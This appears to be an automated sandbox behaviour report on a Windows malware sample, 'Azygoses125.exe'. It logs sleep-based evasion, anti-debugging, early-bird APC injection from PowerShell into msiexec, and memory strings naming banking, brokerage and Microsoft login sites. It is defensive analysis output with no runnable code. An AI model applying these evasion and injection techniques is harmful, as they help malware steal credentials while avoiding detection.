Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598566	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596225	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595930	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593360	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5590			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4088			Jump to behavior

Source: C:\Users\user\Desktop\Azygoses125.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq93A2.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7944	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6328	Thread sleep count: 8006 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -599782s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6328	Thread sleep count: 1809 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -599282s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -599172s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -598566s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -596225s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -595930s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -593985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -593860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -593735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -593610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -593485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 424	Thread sleep time: -593360s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Azygoses125.exe	Code function: 3_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	3_2_00405974
Source: C:\Users\user\Desktop\Azygoses125.exe	Code function: 3_2_004064C6 FindFirstFileW,FindClose,	3_2_004064C6
Source: C:\Users\user\Desktop\Azygoses125.exe	Code function: 3_2_004027FB FindFirstFileW,	3_2_004027FB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598566	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596225	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595930	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593360	Jump to behavior

Source: msiexec.exe, 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd24aa9531a714<
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: ModuleAnalysisCache.5.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: msiexec.exe, 00000009.00000002.2530233979.0000000000B39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: msiexec.exe, 00000009.00000002.2530233979.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2530233979.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020B91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd24d391d1b18f<
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: ModuleAnalysisCache.5.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: ModuleAnalysisCache.5.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: msiexec.exe, 00000009.00000002.2547152086.0000000021C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\Azygoses125.exe	API call chain: ExitProcess graph end node			graph_3-3613
Source: C:\Users\user\Desktop\Azygoses125.exe	API call chain: ExitProcess graph end node			graph_3-3605

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\msiexec.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_042ED430 LdrInitializeThunk,

5_2_042ED430

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4220000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
